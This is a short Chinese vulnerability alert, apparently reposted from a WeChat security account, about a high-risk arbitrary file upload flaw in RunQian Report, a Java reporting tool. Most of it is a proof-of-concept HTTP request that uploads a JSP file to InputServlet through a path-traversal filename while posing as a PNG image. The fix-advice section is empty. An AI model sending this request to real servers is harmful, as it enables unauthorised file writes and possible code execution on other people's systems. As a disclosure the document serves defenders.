-
暂无
-
高危
润乾报表是一个纯JAVA的企业级报表工具,润乾报表作为领先的企业级报表分析软件,提供了高效的报表设计方案、强大的报表展现能力、灵活的部署机制,以及支持强关联语义模型。这些功能使得润乾报表能够为企业级数据分析与商业智能提供高性能、高效率的报表系统解决方案。
-
润乾报表
0x05 POC
POST /InputServlet?action=12 HTTP/1.1
Host: {host}
Content-Type: multipart/form-data; boundary=--------------------------170005680039721412137562
Accept-Encoding: gzip, deflate, br
Content-Length: 2401
----------------------------170005680039721412137562
Content-Disposition: form-data; name="upsize"
1024
----------------------------170005680039721412137562
Content-Disposition: form-data; name="file"; filename="/..\..2.jsp"
Content-Type: image/png
11111
----------------------------170005680039721412137562--
0x06 修复建议
原文始发于微信公众号(浅安安全):漏洞预警 | 润乾报表任意文件上传漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论